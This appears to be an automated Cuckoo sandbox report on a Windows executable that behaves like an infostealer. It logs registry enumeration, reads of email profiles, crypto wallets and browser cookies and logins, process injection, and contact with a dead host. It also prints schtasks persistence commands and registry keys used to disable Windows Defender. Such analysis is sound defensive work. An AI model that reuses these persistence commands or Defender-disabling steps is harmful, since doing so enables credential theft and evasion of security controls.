regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExA

key_handle: 0x00000494
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
file C:\Users\test22\AppData\Roaming\ICQ\0001
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process face.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
process explorhe.exe useragent
process InstallSetup7.exe useragent NSIS_Inetc (Mozilla)
process rty25.exe useragent HTTPREAD
description Possibly a polymorphic version of itself
file
name: a41ff6402d00da75_8G51dyVKnnvS40g1JD2e.exe
filepath: C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe
path: /home/cuckoo/.cuckoo/storage/analyses/47572/files/a41ff6402d00da75_8G51dyVKnnvS40g1JD2e.exe
size: 1207296
type: PE32 executable (GUI) Intel 80386, for MS Windows
pids: 1792, 2416
crc32: BA8ED5CF
md5: 697b929b3a29125832a5814f22e15337
sha1: 8715a140542b52ed2fa2a38a76e1d2032643a943
sha256: a41ff6402d00da752f2fefd4286c76771d51a14e4d8eb2ceca494863cf0b3334
sha512: 558700b057955c5674b25303df2af6b8df19761b601e96c07d3b41e5586786dbfb65e2977d70d2ccecebd80c12a4fb2d932cda49daa9b87613832795ca29f300
ssdeep: 24576:+Z4uCjOyp+O4vBOpspnYW4wQHBaWnBCqgqZcWycSmC:sgjOWFpjzlHBaWntgqZcX
urls: (none)
virustotal: resource has not been scanned yet
yara:
• IsPE32 - (no description)
• Malicious_Packer_Zero - Malicious Packer (author: r0d, date: 2021-03-16, update: 2021-04-14); string o104 'bnRkbGwuZGw=' matched at offset 562778
• PE_Header_Zero - PE File Signature (author: r0d, ini_date: 2020-06-03); string signature 'TVo=' matched at offset 0
• anti_vm_detect - Possibly employs anti-virtualization techniques (author: nex); string virtualpc 'Dz8HCw==' matched at offset 897037
file C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file c:\Windows\Temp\fwtsqmfile01.sqm
file C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file c:\Windows\Temp\fwtsqmfile00.sqm
file C:\Users\test22\AppData\Local\Temp\F59E91F8
file C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file C:\Windows\Prefetch\TRUSTEDINSTALLER.EXE-3CC531E5.pf
file C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file C:\Windows\Prefetch\TASKHOST.EXE-7238F31D.pf
file C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf
file C:\Windows\Prefetch\AgGlFgAppHistory.db
file C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf
file C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file C:\Windows\Prefetch\AgRobust.db
file C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\D87fZN3R3jFeplaces.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\JX0OQi4nZtiqplaces.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\IWPfiAXUTJTSformhistory.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\02zdBXl47cvzHistory
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\D87fZN3R3jFeWeb Data
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\02zdBXl47cvzcookies.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\IWPfiAXUTJTSHistory
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\5lop_S5WM5ERCookies
file C:\Users\test22\AppData\Local\Temp\3WCfXFplHcxIJHg4Pd6b5AQxGpX8awic.zip
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\QdX9ITDLyCRBplaces.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\3b6N2Xdh3CYwWeb Data
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\3b6N2Xdh3CYwplaces.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Ei8DrAmaYu9KLogin Data
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KvHrxJ77cmUgcookies.sqlite
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\QdX9ITDLyCRBWeb Data
file C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\latestrocki[1].exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file C:\Users\test22\AppData\Local\Temp\jobA3F6U_tCj88G2a2\information.txt
file C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file C:\Users\test22\AppData\Local\Temp\Setup00000994\SETUP.CHM
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file C:\Windows\Prefetch\AgAppLaunch.db
file C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file c:\Windows\Temp\TS_7FC6.tmp
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
Process injection Process 2776 resumed a thread in remote process 2856
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2856
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
file C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf
dead_host 185.172.128.53:80
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection